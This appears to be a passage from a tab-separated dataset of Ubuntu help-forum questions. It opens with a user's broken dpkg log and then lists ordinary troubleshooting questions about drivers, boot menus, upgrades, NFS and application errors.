stopping web server apache2 > * the apache2 configtest failed , so we are trying to kill it manually . this is almost certainly suboptimal , so please make sure your system > is working as you 'd expect now ! ... waiting > [ ok ] removing apache2.2-common ... removing apache2-utils ... > removing apache2.2-bin ... removing libaprutil1-ldap ... removing > libaprutil1-dbd-sqlite3 ... removing libaprutil1 ... removing libapr1 > ... processing triggers for man-db ... locale : can not set lc_ctype to > default locale : no such file or directory locale : can not set lc_all to > default locale : no such file or directory processing triggers for > ureadahead ... processing triggers for ufw ... warn : /etc is group > writable ! processing triggers for libc-bin ... ldconfig deferred > processing now taking place ( reading database ... 45709 files and > directories currently installed . ) preparing to replace libc6-dev > 2.13-20ubuntu5.1 ( using ... /libc6-dev_2.13-20ubuntu5.3_amd64.deb ) ... unpacking replacement libc6-dev ... preparing to replace libc-dev-bin > 2.13-20ubuntu5.1 ( using ... /libc-dev-bin_2.13-20ubuntu5.3_amd64.deb ) ... unpacking replacement libc-dev-bin ... processing triggers for > man-db ... locale : can not set lc_ctype to default locale : no such file > or directory locale : can not set lc_all to default locale : no such file > or directory dpkg : warning : overriding problem because -- force > enabled : this is an essential package - it should not be removed . > dpkg : warning : overriding problem because -- force enabled : this is an > essential package - it should not be removed . dpkg : warning : > overriding problem because -- force enabled : this is an essential > package - it should not be removed . dpkg : warning : overriding problem > because -- force enabled : this is an essential package - it should not > be removed . dpkg : warning : overriding problem because -- force enabled : > this is an essential package - it should not be removed . dpkg : > warning : overriding problem because -- force enabled : this is an > essential package - it should not be removed . dpkg : warning : > overriding problem because -- force enabled : this is an essential > package - it should not be removed . dpkg : warning : overriding problem > because -- force enabled : this is an essential package - it should not > be removed . dpkg : warning : overriding problem because -- force enabled : > this is an essential package - it should not be removed . dpkg : > warning : overriding problem because -- force enabled : this is an > essential package - it should not be removed . dpkg : warning : > overriding problem because -- force enabled : this is an essential > package - it should not be removed . dpkg : warning : overriding problem > because -- force enabled : this is an essential package - it should not > be removed . dpkg : warning : overriding problem because -- force enabled : > this is an essential package - it should not be removed . dpkg : > warning : overriding problem because -- force enabled : this is an > essential package - it should not be removed . dpkg : warning : > overriding problem because -- force enabled : this is an essential > package - it should not be removed . dpkg : warning : overriding problem > because -- force enabled : this is an essential package - it should not > be removed . dpkg : libc-bin : dependency problems , but removing anyway > as you requested : libc6 depends on libc-bin ( = 2.13-20ubuntu5.1 ) . > ( reading database ... 45614 files and directories currently > installed . ) removing libc-bin ... processing triggers for man-db ... > ca n't exec `` locale '' : no such file or directory at > /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized > value $ debconf : :encoding : :charmap in scalar chomp at > /usr/share/perl5/debconf/encoding.pm line 17. dpkg : warning : > 'ldconfig ' not found in path or not executable . dpkg : error : 1 > expected program not found in path or not executable . note : root's > path should usually contain /usr/local/sbin , /usr/sbin and /sbin . e : > sub-process /usr/bin/dpkg returned an error code ( 2 ) after executing what i got from comment i see following error sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libemail-send-io-perl libgd-text-perl libchart-perl libmime-types-perl libemail-mime-encodings-perl libalgorithm-c3-perl libgd-graph3d-perl libclass-load-perl libio-all-perl libgd-gd2-perl libxml-parser-perl libmime-tools-perl libmath-round-perl libemail-abstract-perl dbconfig-common libclass-c3-perl libfcgi-perl libdatetime-timezone-perl libgd-graph-perl cvs libparams-validate-perl libcgi-pm-perl libemail-mime-contenttype-perl libmro-compat-perl libdatetime-perl libdatetime-locale-perl libjs-yui libemail-messageid-perl libfilter-perl libtemplate-plugin-gd-perl libemail-date-format-perl libreturn-value-perl libspiffy-perl libperl5.12 libemail-mime-perl liblist-moreutils-perl libemail-send-perl libconvert-binhex-perl libmail-sendmail-perl perlmagick libappconfig-perl libsys-hostname-long-perl libemail-simple-perl libclass-singleton-perl libemail-address-perl libclass-c3-xs-perl libtemplate-perl use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libc-bin libc6 suggested packages : glibc-doc the following new packages will be installed : libc-bin the following packages will be upgraded : libc6 1 upgraded , 1 newly installed , 0 to remove and 148 not upgraded . 2 not fully installed or removed . need to get 0 b/5296 kb of archives . after this operation , 3269 kb of additional disk space will be used . do you want to continue [ y/n ] ? y perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lc_ctype = `` utf-8 '' , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value $ debconf : :encoding : :charmap in scalar chomp at /usr/share/perl5/debconf/encoding.pm line 17 . preconfiguring packages ... dpkg : warning : 'ldconfig ' not found in path or not executable . dpkg : error : 1 expected program not found in path or not executable . note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin . e : sub-process /usr/bin/dpkg returned an error code ( 2 )
294770	shutdown option is not working in ubuntu 11.10	i done my below option in my netbook acer aspire one d260 netbook version . i tried to upgrade my ubuntu version from 11.10 to 12.04 . unfortunately it was stopped due to my internet disconnect . i tired to kill all the process using system monitor tool ( select all process and press end process ) . after above all those action my system not responding whenever i tried to shut down or log out . i tried in terminal window using shutdown -h now command , but it tells that need to be root . but hibernate and suspend options are working fine . can anyone guide me how to solve this issue ? thanks in advance !
294774	can my android phone run ubuntu phone os	i recently heard that android phones can be converted to ubuntu phones ... i just want to know if my phone sony xperia sola ( 1ghz dual-core , 512mb ram ) can run ubuntu on it ( is there really any provision for this ) ? please let me know , because i really want to get rid of my android .
294775	all open windows fade and stay faded even when responsive	i am experiencing an issue whereby all open windows fade out as if unresponsive and yet are fully functioning . new windows and dialog boxes appear at full brightness but the existing windows do not . dragging a tab in chrome to make a new window puts it in full brightness as does closing and reopening any apps . as far as i can tell changing the compiz settings is not having an effect . certainly when i switch of fade unresponsive windows nothing changes . this problem appears to be intermittent and i do not know of any specific trigger . it has only been an issue since upgrading from the last lts version . that has left me wondering if this is a unity issue but i lack enough experience with unity ( or ubuntu ) to truly figure out what the cause is . my specs are : release 12.04 ( precise ) 64-bit ; kernel linux 3.2.0-40-generic ; gnome 3.4.2 ; ram 16gb ( reported as 15.7gb ) ; chip : amd phenom ii x2 555 processor . i 've not yet attempted core unlocking on the two disabled cores so i know it is not a system stability issue from that . can anyone help me find some way of sensibly stopping this from happening any more or , failing that , something i can do to return my windows to full brightness . cheers .
294778	is there a command to force unity to reload menu data ?	not all the time but intermittently unity will drop the menu from the hud . most often this is with gimp but it has happened to other programs too . the menu choices are there but the content of the menu is empty and the hud has no record of the commands . this can make even simple things like saving very difficult . is there some command that i am unaware of to make unity go and reload the menu data from wherever it gets it and rebuilt it 's menu information . my specs are : release 12.04 ( precise ) 64-bit ; kernel linux 3.2.0-40-generic ; gnome 3.4.2 ; ram 16gb ( reported as 15.7gb ) ; chip : amd phenom ii x2 555 processor .
294779	remove the additional entries in grub	i was trying to get a dual-boot set up with windows 8 and ubuntu 13.04 . after installing ubuntu , it would n't let me go back into windows 8 . so i ran boot-repair and it fixed it self . now i have all these different entries under my grub menu . how do you remove the entries that are broken and only leave the ones that work ? here is the list of entries under my grub menu .
294782	how to format a partition containing master boot record in linux 12.10 ?	few days ago i have installed linux 12.10 in my 16 gb usb drive . it was working fine . after some days , i wanted usb for my other uses , so i tried to format it . whole usb gets formatted but the partition of 8 gb containing master boot record did n't . so , now usb drive showing me only 8 gb of free space . please help me soon . i have windows 7 on my hard disk also .
294783	where to find the canon capt driver ?	canon capt driver v2.4 was to be download from a link posted here , but when i write this the link is dead . i had the driver and have uploaded it here . but i suppose the driver and even a newer version should be available . is it ?
294784	file transfer ubuntu to ubuntu by usb	i have to share a file ( 40 gb ) to another computer but , using dvds and flash drives is too hard . and i have a usb cable which i can plug into the two computers at same time . can i use it to transfer the file between two ubuntu computers ?
294786	file copy to ntfs usb drive from ext4 very very slow	i am getting very slow copy speeds ( 506.4 kb/sec is average ) when copying files from my ext root partition or any other ext4 partition onto an external usb ntfs partition . when i was using ubuntu 11 the copy speeds for the same drive were over 10mb/sec . this makes file copying for windows machines virtually impossible with large files ( 3hrs for 5gb ) . why would ubuntu 11 and previous versions run fast while both 12.1 and 13.04 are way too slow ?
294787	can not get web-apps working in ubuntu 12.10	i have been using vanilla ubuntu 12.10 since it came out , and i will be upgrading to 13.04 in a month or two . however , i recently decided to try to install a couple of web-apps . i was unable to do so , even with some googling . i have enabled `` prompt integration options for any website '' in my firefox general settings and cleared any exceptions . i have checked that the 'unity-webapps-service ' service is installed , and i have installed e.g . the 'unity-webapps-twitter ' package , amongst others . i have opened up dconf editor and set to default all the settings under com > canonical > unity > webapps and i have even run the command 'gsettings reset com.canonical.unity.webapps allowed-domains' nothing seems to work in order to allow me to use or install ubuntu webapps . is there anyone who knows a solution ? thanks in advance !
294791	smartgit ubuntu 13.04 64bits crash startup	i try to launch smartgit with ubuntu 13.04 but it crash on startup . i tried with openjdk and the oracle java . here is the error : # # a fatal error has been detected by the java runtime environment : # # sigsegv ( 0xb ) at pc=0x00007ffe85fe5009 , pid=10572 , tid=140732854384384 # # jre version : 7.0_21-b11 # java vm : java hotspot ( tm ) 64-bit server vm ( 23.21-b01 mixed mode linux-amd64 compressed oops ) # problematic frame : # c [ libsoup-2.4.so.1+0x6e009 ] soup_session_feature_detach+0x19 # # failed to write core dump . core dumps have been disabled . to enable core dumping , try `` ulimit -c unlimited '' before starting java again # # an error report file with more information is saved as : # /home/pol/programmes/smartgithg-4_5_2/bin/hs_err_pid10572.log # # if you would like to submit a bug report , please visit : # http : //bugreport.sun.com/bugreport/crash.jsp # the crash happened outside the java virtual machine in native code . # see problematic frame for where to report the bug . # ./smartgithg.sh : ligne 74 : 10572 abandon ( core dumped ) $ _java_exec $ _vm_properties -xmx $ { smartgithg_max_heap_size } -xverify : none -dsmartgit.vm-xmx= $ { smartgithg_max_heap_size } -jar `` $ smartgit_home/lib/bootloader.jar '' `` $ @ '' i do n't know what to do to make it work.. i 'm using ubuntu 13.04 64bits with java version `` 1.7.0_21 '' . thank you
294793	install ubuntu on windows machine	i am a new ubuntu user with years of experience using macs . today for the first time i got a windows machine ( ibm t31 , 1gb ram , 1.6ghz cpu , 20gb hdd ) , and i wanted to install ubuntu so i downloaded ubuntu 12.04 as well as 13.04 . ubuntu 12.04 did not recognize my wired network . ubuntu 13.04 did recognize my network and installed properly . after the installation was finished , i rebooted and got nothing . how can i fix this ?
294796	passwords differ for tty and kde	i am rather a linux beginner , so pardon me if i get my terms mixed up a bit . i am running kubuntu and had a password ( let 's call it a ) for my account ( acc ) . i wanted to change it , so i ran tty ( ctrl+alt+f6 ) , logged as acc with password a , ran $ passwd and changed it to password b . now , i can log into tty as acc with password b , but can not log in the kde ( ~the graphic desktop ) with neither a nor b. i tried changing it through system settings , but that does not work , since i need to provide my current password ( which should be b , but for some reason is not ) . what did happen ? how can i reset the password ? i tried changing it to password c , but to no good . thanks for help
294806	shortcut to change workspace 13.04	until 13.04 , i could change my workspace using ctrl+alt+arrow but since 13.04 it is impossible . is there a way to have a shortcut back ?
294807	ubuntu 12.04 alsamixer not found	i have a lenovo y500 with windows 8 . i successfully got ubuntu 12.04 installed alongside windows 8 and the nvidia drivers just worked from the start . the sound was n't working at all however , and although alsamixer was alive and well when i started out , i seemed to have completely destroyed it now . i keep getting : $ alsamixer can not open mixer : no such file or directory kernel version : $ uname -a linux laptop 3.5.0-28-generic # 48~precise1-ubuntu smp wed apr 24 21:42:24 utc 2013 x86_64 x86_64 x86_64 gnu/linux i 've tried both of the following packages from https : //code.launchpad.net/~ubuntu-audio-dev/+archive/alsa-daily/+packages : oem-audio-hda-daily-dkms - 0.201305101424~precise1 oem-audio-hda-daily-lts-quantal-dkms - 0.201305101424~precise1 but to no avail . this is the output of my alsa-info : http : //www.alsa-project.org/db/ ? f=09851ab8c4380c25feaea7ff1de68d847bd4160c i 've tried many other solutions as well but nothing seems to get alsamixer back , nevermind trying to get the audio to work again . ps . when alsamixer was still working i did check the levels and it was not a case of the channels being muted . edit /usr/bin is in $ path . no asound rc or conf files anywhere . alsamixer is in /usr/bin , ca n't run it as alsamixer , /usr/bin/alsamixer not with sudo , even after purging and re-installing alsa-utils . edit 2 $ ls /dev/mixer -l ls : can not access /dev/mixer : no such file or directory $ ls /usr/bin -l | grep alsamixer -rwxr-xr-x 1 root root 65344 mar 28 23:54 alsamixer -rwxr-xr-x 1 root root 61272 dec 18 2011 gnome-alsamixer edit 3 $ ls /dev/snd -l ls : can not access /dev/snd : no such file or directory
294808	connect monitor to headless server	i 've inherited a server running on ubuntu which has a keyboard connected , but no monitor . now there 's been a network problem and i 'm currently unable to connect via ssh ( not even ping works ) . still , calculations started by someone else might be running . for diagnosis , i plugged a monitor to vga , but this monitor gets no signal and stays black . how can i activate the monitor ? i do n't need a gui , seeing bash would already be ok .
294811	how might i install fglrx 9.0.2 on ubuntu 13.04 ?	the fglrx-updates package in 13.04 contains fglrx 9.1.11 . for some reason , this driver is not nearly as good for certain opencl work as the 9.0.2 driver found in fglrx-updates for ubuntu 12.04 and 12.10 . how might i go about installing fglrx 9.0.2 on ubuntu 13.04 ? any reason why i can not or should not ? i could certainly go back to 12.04 lts , but it would be nice to stay on 13.04 .
294812	how to remove ubuntu 10.04/10.10/etc without replacing it with another os ?	is there a way to completely remove ubuntu 10.04/10.10/etc from a hdd without replacing it with another os , so the hdd will return to its origin-state ( empty ) ? i have googling this , as well as using the search facility in this site , but still came empty-handed . most of the solution for removing/deleting ubuntu presume that we will install windows 7/vista/xp in the hdd and suggesting to use windows bootable disk/usb to format the ubuntu partition then install the windows . but what i am intend to do is to get an empty/clean hdd without any system within . i also do n't have any windows bootable disk/usb . can anyone shed some light about this ? thanks .
294815	how do i install gpointing-device - i seem to have got my brain into a loop	i would like to install the gpointing-device-settings package which i found on the launchpad website https : //launchpad.net/ubuntu/+source/gpointing-device-settings i tried : apt-get install gpointing-device-settings but i get the following reply : e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? i also tried add-apt-repository ppa : gpointing-device-settings and got error : must run as priviledged user can anyone point me in the right direction please as i seem to have got my brain into a loop ...
294816	ubuntu 12.04 lts - toshiba touchpad not working	i have a toshiba satellite t130-10g laptop and i ca n't get my touchpad to work in ubuntu 12.04 lts ( i have tried also 12.10 and did not work either ) . in the same laptop i have windows 7 installed and the touchpad works 100 % so i know it is n't hardware failure . i 've also already installed 2 different softwares to check if touchpad is enabled , and it is on both ( i do n't recall the names but i found them in similar problems here ) . if i go to system settings and select mouse and touchpad i have both tabs there . also , if i plug an usb mouse it works 100 % but the touchpad remains dead ... i do have a fn+f9 shortcut to enable/disable touchpad in windows 7 ( which works correctly ) but does nothing in ubuntu 12.04 lts . please help me ... i do n't know what else to do ...
294817	how to unzip and display as plain text .foo.gz files in firefox ?	using firefox ( currently at version 20.0 ) , when browsing to a url containing a file with an extension of .foo.gz , how can i make firefox download it to a temporary location , un-gzip it and display the result as a plain text file ? thanks in advance !
294818	how can i join an ubuntu 12.10 client to join a windows domain ( server 2008 )	in my office am using windows server 2008 recently am install ubuntu 12.10 in my offz its really awesome but little bit am struggling about few configurations and settings ... now also am struggling about one thing today am tried ubuntu 12.10 client join to windows server 2008 following this http : //www.petenetlive.com/kb/article/0000384.htm website i did all commands but am not get the log in window in ubuntu 12.10 , my windows server in active directory ubuntu is added in user and computers option who can i join ubuntu 12.10 to windows server any one help me ... .
294819	updating ubuntu from 10.10 to 13.04	i just installed ubuntu 10.10 because i had a physical disk of it . i was n't able to boot 13.04 because of my graphics card i guess . ( amd radeon hd7750 ) . i would like to update my pc from 10.10 to 13.04 i do n't mind incremental updates . the terminal gives error before updating . please help . any help would be greatly appreciated . : ) ekaansh .
294830	how do i recompile python 2.7 on ubuntu 12.04 ?	i am struggling to get the python module sqlite3 to work . i found this , and am following it , since python ca n't seem to find the modules even after installation of the packages . i tried following this walkthrough to recompile python 2.7.2 , but the sym-link step did n't work , giving me this error : `ln : failed to create symbolic link `/usr/local/bin/python2.7 ' : file exists` any input as to go about solving this would be much appreciated .
294834	some icons from xfce4 panel missing	i 'm running xubuntu 13.04 ( xfce4-panel 4.10.0 ) . the icons for skype and synapse are missing in the panel . only a missing icon icon is shown . the icons show correctly in the apps menu . i 've tried reinstalling the programs and removing and adding them back to the panel , but to no avail . no errors shows up in the syslog . is there anything else i can try ? edit : the icon theme is elementary xfce . i noticed that switching to kde-hicolor fixed the problem . but i do n't really like that theme . is there a way to add the icons to the elementary xfce theme ? using the icon pack suggested my m.hannysabbagh did n't work ( still the same problem with missing icons ) . on my other computer i 'm running xubuntu 12.10 with icon theme tango . the skype icon looks good on that computer , but trying the tango theme on my 13.04 computer results in the same `` icon missing '' icon as the elementary xfce theme .
294840	can not edit software sources after upgrading from 12.10 to 13.04	i go to system settings - > software sources . i see there many software sources with the comment `` disabled on upgrade to raring '' . when i click on the check-button or select ppa name to edit/delete that source nothing happens . this behaviour only occurs with sources inherited from 12.10 . sources added after upgrade can be removed correctly . what should i do ?
294847	what are the packages and libraries needed to print a file into pdf ?	which packages and libraries are necessary to print a file into pdf file , especially a webpage , text file or an office document ( spread sheet and word processor ) ? for instance , cups - is it necessary to have it ? ps : i have no hardware printer . i have an old laptop which i plan to make as lightweight as possible as it came across me .
294848	installing samba on a seperate volume ( hard disk )	i have managed to get my first ubuntu server ( minimal ) setup up and running on a 1gb internal usb header stick . what i need to do now is to install the file server , but on a separate physical disk ( 500gb ) , including the configuration files . is there a way to do this ? i can not use the apt-get functions because i have deployed a minimal install , as a normal install wo n't fit on the boot volume . ( i 'm new to ubuntu server , so i would appreciate that complex-talk be kept to a minimum )
294850	does canonical have other deals with companies like the amazon search feature ?	i was interested to find out if canonical , the producers of ubuntu , have other financial dealings for integrated features of their operating system , other than the controversial amazon search feature ? how else is funding for ubuntu achieved ?
294864	libre office menu does not show submenus automatically	i 've just update my libreoffice 4.0.2.2 to 4.0.3.3 ... . when i start writer , impress or calc , the first time i click on any main menu it does not show submenus automatically ( i recorded problem using recordmydesktop and uploaded to the following link . i heard that menu issues are realted to unity . so is it ubuntu or libreoffice problem ? and any idea how to fix it ? i am using ubuntu 13.04 and libre office 4.0.3.3 . ( this did n't happen in 4.0.2.2 . ) ..
294865	how can i dual boot ubuntu 13.04 with windows 7 home premium ?	i have a nice impression to ubuntu before and i want to dual boot it with my windows os . ( i 'm a total newbie in this field : d ) i have downloaded the latest universal usb installer and the ubuntu 13.04 iso ( the 32-bit version ) . then , i 've burned the installer to my usb . my laptop is samsung x420 and i ca n't create another partition for ubuntu because these built-in partitions : unnamed [ healthy ( recovery partition ) ] = 15gb , 0gb used unnamed [ healthy ( system , active , primary partition ) ] = 100mb , 72mb used ( c : ) [ healthy ( boot , page file , crash dump , primary partition ) ] = 141.49gb , 68.5gb used ( g : ) [ healthy ( primary partition ) ] = 141.50gb , 118.49gb used after i restarted my laptop , there was no boot menu for ubuntu or anything installation guide . it simply restarted to windows 7 . i checked again my usb and i found the wubi app . then , i ran it as administrator and chose the `` reboot now . '' but nothing happened . as usual , goes directly to windows . i have n't formatted my usb because its already fat32 and i 'm afraid to loose important files stored there . i hope someone will throw light in me regarding this issue . t___t feel free to reply/contact if you 're still confused . ( sorry for my bad english )
294868	how to start xbmc instead of unity	how can i set ubuntu to start xbmc at login instead of unity ? i know i can choose between the two interfaces when logging out , but it always goes on to unity when booting . thank you very much !
294869	where do i find the insync log file ?	when contacting the customer service of insync they ask to send the logs where do i find them in ubuntu ?
294875	flv metadata editor gui	are there any programs for ubuntu 13.04 that allow the user to edit the metadata of flv videos ? i would prefer a graphical user interface . command-lines are fine if that is all that exists .
294877	how to setup nfs on 13.04 and 12.10	i used my 12.10 as my nfs server . and the 13.04 as the client . after installing nfs to both of my laptops i added this in /etc/exports /export client.ip.add.ress/24 ( rw , fsid=0 , insecure , no_subtree_check , async ) /export/users client.ip.add.ress/24 ( rw , nohide , insecure , no_subtree_check , async ) then i tried to run on my 13.04 this $ sudo mount servername : /export/users /mnt then i got the error mount.nfs : failed to resolve server servername : system error i tried to follow the instructions in this site .
294878	how to run matlab ( 64bit ) on ubuntu 12.04 ( 32bit )	i 've ubuntu 12.04 ( 32bit ) and windows 7 ( 64bit ) . i 've installed `` matlab-r2011b '' on windows 7 . how can i run that on ubuntu without using wine ?
294882	want to repair grub	i have ubuntu 12.04 and windows 8 installed on my system . the main boot manager is grub , also the ubuntu and windows are installed in separate partitions . i want to install windows 7 back in place of windows 8 , but i want to repair grub , so that ubuntu and windows 7 will work fine . please help thanks in advance .
294883	how do i upgrade from 12.04 to 13.04 using usb	i can boot from the live cd for 13.04 off a usb stick , but the option to upgrade my system is greyed out -- is it not possible to upgrade from the live cd desktop edition ? should i upgrade to 12.10 first ?
294887	problem setting monitors to native resolution with dell laptop ( ubuntu 13.04 )	i 've just installed ubuntu 13.04 on my dell d631 laptop . i was using windows 7 previously which coped perfectly with my set up . i dock it all the time in a docking station so that i can use two dell fp1708fp monitors and keep the laptop lid shut . i believe the laptop has a radeon x1200 series onboard graphics card ( reported as gallium 0.4 on ati rs690 in ubuntu settings ) . in windows 7 it was quite happy to un-mirror the displays and allow an extended desktop at resolution of 1280x1024 on both screens . but ubuntu can not seem to cope with setting the resolution to anything other than 1024x768 or 1152 x 864 . if i try to set both monitors to the native resolution of 1280x1024 i get an error that it 's beyond the capability of the 3d device . i 've tried a number of things including running xrandr which reports that both vga-0 and dvi-0 are capable of 1280x1024 and installing arandr . arandr provided better results in that i could set the resolution how i wanted but then the displays seem to corrupt as if it was bad video memory , with half a window on both screens and two mouse pointers showing at certain points of the screen ( one on one screen and one on the other as if mirroring were happening , but not all over the screen ) anyone know how i can set both external monitors ( one attached via vga cable and the other attached via dvi ) can be set to 1280x1024 ? thanks
294889	how to expand the ext4 primary partition size in a vmware player virtual disk ?	i have a vmware player virtual machine setup , running ubuntu 10.04 as the a guest os . the vm was created on a 20gb virtual drive , with a single partition for working space . finally i got to the point where i need to expand the size of the virtual drive . resizing the drive itself , adding some 10gb , was easy via the vmware player menus . i now need to resize the main partition itself ( i prefer this over creating a separate partition and mounting it ) . according to gparted , i now have the following partitions : my question is , how can i increase the size of the filesystem partition to include the free 10gb ? from information i found online , it looks like one limitation is the fact that he swap partition is immediately adjacent to the filesystem , so my understanding is that first thing would be to move that partition to the end of the volume . how can this be done ? also , some sources suggest that the system should be booted from a livecd , so the filesystem is not the boot partition , and thus make it easier to resize . as mentioned above , i run a vm , so i am not sure how to boot it from a livecd . any ideas ?
294900	how to transfer music to a windows phone device ?	i recently bought a nokia 620 . ubuntu 13.04 does recongize it and is able to mount it . music files transferred through the file explorer do n't show up at all in my phones media player . trying to do it with rhythmbox makes it crash . i have found that clementine is able to do the job . however , transferred tracks lose their `` artist '' tag for some reason . so here comes the question : what program you use to transfer music on you wp device ? or do you do it through windows ?
294901	how to disable `` recent files '' folder in nautilus ?	when i turn off `` record activity '' in the privacy settings , my activities are still recorded in the `` recent files '' folder ( even when i am using a truecrypt volume ) . i have n't figured out a permanent solution to this problem . it sucks to delete history via terminal manually and what happens if i forget ?
294903	how do i install the latest openoffice.org ?	today i downloaded and installed openoffice through the ppa repositories , using apt-get ( hope that 's what i mean to say ) , and when the program checked for updates it said there was a new version - 3.4.1 which i need to download from the website . i am reluctant to download from the website , because i tried this earlier ( before using the ppas ) and while i was able to download the .tar.gz file and extract the debs , i could n't figure out how to install it . i found instructions on the internet that told me how to install , but for some reason , ubuntu did n't know the application was installed ! could n't find it in dash , and to run i had to find the openoffice folder and doubleclick soffice.bin . so my question is , how to i download and install the latest version of openoffice without it being messed up as above ?
294904	upgrading from ubuntu 12.10 to 13.04	first of all , this is the first time i am trying to upgrade . i want to upgrade my ubuntu 12.10 to 13.04. in some thread it says just to use update manager to update . i am doing this right now sudo apt-get update sudo apt-get upgrade just a little bit confused . how this could upgrade my system to 13.04 . is it really upgrade full system or just updated specific programs ? if it 's not then how to upgrade my system ?
294916	peer to peer ( p2p ) sync and share ubuntu	i want to share files across my network and on remote sites , so i am looking for p2p sync/sharing application . just like ubuntu one & drop box , but it does not have p2p protocol.i want p2p because i want to save bandwidth on my local network .
294917	ca n't download ubuntu	i am unable to download ubuntu 13.04. the hosting site always claims the server is down and it has been like this since 10am gmt . any help guys ? i really need this to install to my laptop as i prefer it substantially over windows 7
294920	slow wireless connection speed on 13.04 / ralink corp. rt5390	i have just installed a fresh copy of 13.04 desktop today and am having some performance issues with my wireless card . running a test on my phone , i get 9 meg download speeds . currently on my laptop with ubuntu , i 'm getting less than 1 meg . i am almost directly next to the router so no issues with lack of signal - the icon in the top right displays 3 bars out of 4 . running lspci -nnk | grep -ia2 net outputs the following ... 02:00.0 network controller [ 0280 ] : ralink corp. rt5390 wireless 802.11n 1t/1r pcie [ 1814:5390 ] subsystem : hewlett-packard company u98z077.00 half-size mini pcie card [ 103c:1636 ] kernel driver in use : rt2800pci running ifconfig outputs the following ... wlan0 link encap : ethernet hwaddr 88:9f : fa:95 : d1:1a inet addr:192.168.0.5 bcast:192.168.0.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 rx packets:49100 errors:0 dropped:0 overruns:0 frame:0 tx packets:37734 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:62009821 ( 62.0 mb ) tx bytes:6558420 ( 6.5 mb ) i suspect that there is an issue with the rt2800pci driver that 's currently in use . i have no idea how to assign a new driver . i have disabled ipv6 to no avail . any help would be greatly appreciated !
294924	how to make a queue of download list and how schedule it	1- how to make a queue of download-list in wget ? 2- is there any way to schedule a queue in wget ?
294925	error starting icem cfd : glibcxx_3.4.9 not found	when trying to start icemcfd ( a meshing tool for flow simulations ) i recieve an error message and analysing it with libgl_debug=verbose yields : ldzq68 @ ds-ecstl-001 : /usr/ansys_inc/v121/icemcfd/linux/bin $ libgl_debug=verbose ./icemcfd icem_acn is /usr/ansys_inc/v121/icemcfd/linux ansyslic_dir is set to /usr/ansys_inc/shared_files/licensing args window information : depth = 24 class = 4 visual depth = 24 class = 4 libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/tls/r600_dri.so libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/r600_dri.so libgl error : dlopen /usr/lib/i386-linux-gnu/dri/r600_dri.so failed ( /usr/ansys_inc/v121/icemcfd/linux/lib/libstdc++.so.6 : version `glibcxx_3.4.9 ' not found ( required by /usr/lib/i386-linux-gnu/libllvm-3.1.so.1 ) ) libgl : opendriver : trying $ { origin } /dri/tls/r600_dri.so libgl : opendriver : trying $ { origin } /dri/r600_dri.so libgl error : dlopen $ { origin } /dri/r600_dri.so failed ( $ { origin } /dri/r600_dri.so : can not open shared object file : no such file or directory ) libgl : opendriver : trying /usr/lib/dri/tls/r600_dri.so libgl : opendriver : trying /usr/lib/dri/r600_dri.so libgl error : dlopen /usr/lib/dri/r600_dri.so failed ( /usr/lib/dri/r600_dri.so : can not open shared object file : no such file or directory ) libgl error : unable to load driver : r600_dri.so libgl error : driver pointer missing libgl error : failed to load driver : r600 libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/swrast_dri.so libgl error : dlopen /usr/lib/i386-linux-gnu/dri/swrast_dri.so failed ( /usr/ansys_inc/v121/icemcfd/linux/lib/libstdc++.so.6 : version `glibcxx_3.4.9 ' not found ( required by /usr/lib/i386-linux-gnu/libllvm-3.1.so.1 ) ) libgl : opendriver : trying $ { origin } /dri/tls/swrast_dri.so libgl : opendriver : trying $ { origin } /dri/swrast_dri.so libgl error : dlopen $ { origin } /dri/swrast_dri.so failed ( $ { origin } /dri/swrast_dri.so : can not open shared object file : no such file or directory ) libgl : opendriver : trying /usr/lib/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/dri/swrast_dri.so libgl error : dlopen /usr/lib/dri/swrast_dri.so failed ( /usr/lib/dri/swrast_dri.so : can not open shared object file : no such file or directory ) libgl error : unable to load driver : swrast_dri.so libgl error : failed to load driver : swrast x error of failed request : badalloc ( insufficient resources for operation ) major opcode of failed request : 154 ( glx ) minor opcode of failed request : 3 ( x_glxcreatecontext ) serial number of failed request : 5496 current serial number in output stream : 5500 after reading other threads i tried updating libstdc++6 and sudo apt-get install libstdc++6 tells me libstdc++6 is already the newest version . so following this advice i updated my stdc++ libraries using sudo add-apt-repository ppa : ubuntu-toolchain-r/test sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade but i still receive the same error when i want to start icem . i 'm new to ubuntu and i just followed any trace google gave me , so i 'm really desperate now . any help is greatly appreciated !
294934	rss reader that can fetch and show the older items of a feed	google reader shows all the older entries of a feed but this service is going to close soon . so is there a feed reader for ubuntu or any online service which can fetch and show the older entries of a feed too - like say 6 months old or more . in case of google reader one can scroll down to have the older entries . i am preparing for the competitive exams and i do not read newspapers daily and i find this to be a convenient way to be updated about current affairs at once .
294938	close/minimize/maximize button not appearing	i was playing around with compizconfig . i do n't remember what exactly i clicked . since then , the close/minimize buttons and the sidebar vanished . i use 12.10 version . please help me out .
